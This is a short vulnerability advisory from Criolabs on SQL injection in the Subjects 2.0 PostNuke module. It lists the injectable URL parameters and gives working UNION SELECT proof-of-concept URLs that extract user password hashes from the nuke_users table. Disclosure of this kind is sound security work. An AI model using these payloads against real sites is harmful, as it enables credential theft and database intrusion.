****************************************************************************************************
                                             CRIOLABS


- Software:  Subjects 2.0 
- Type:      Postnuke module
- Vendor:    Postnuke Modules Factory.



****************************************************************************************************



## Software ##

Software:   Subjects Postnuke module
Version:    2.0
Plataforms: Unix/Win/PHP/MySQL/Postnuke
Web:        http://home.postnuke.ru


## Vendor Description ##

Module is designed for structured store & display text content with a possibility to store
content in file on the disc. Probably, the best one for converting existing based on HTML pages
site to PostNuke.



## Vulnerabilities ##

Sql-Injection in pageid, subid, catid variables.



	## Sql-Injection ##
	
	
	The previous variables are vulnerables to SQL-Injection attacks.
	These SQL injection vulnerabilities allow a remote user to inject arbitrary SQL commands.
	
	/index.php?module=subjects&func=listpages&subid=[SQL]
	/index.php?module=subjects&func=viewpage&pageid=[SQL]
	/index.php?module=subjects&func=listcat&catid=[SQL]

	
	## Proof of Concept ##


	URL to retrieve the MD5 password hash of a user. This POC needs UNION functionality enabled in Mysql to retrieve
	the hash.

        /index.php?module=subjects&func=listcat&catid=1%20UNION%20SELECT%20null,null,pn_pass,null,null,null,null,null
	%20FROM%20nuke_users%20WHERE%20pn_uname='yourname'/*
	
	/index.php?module=subjects&func=listcat&catid=1%20UNION%20SELECT%20null,null,pn_pass,null,null,null,null,null
	%20FROM%20nuke_users%20WHERE%20pn_uid=2/*	          
	
	
	
## History ##


Vendor contacted but no response.



## Solution ##


There is no solution at this time, we recommend to remove immediately this module



## Credits ##


Criolabs staff
http://www.criolabs.net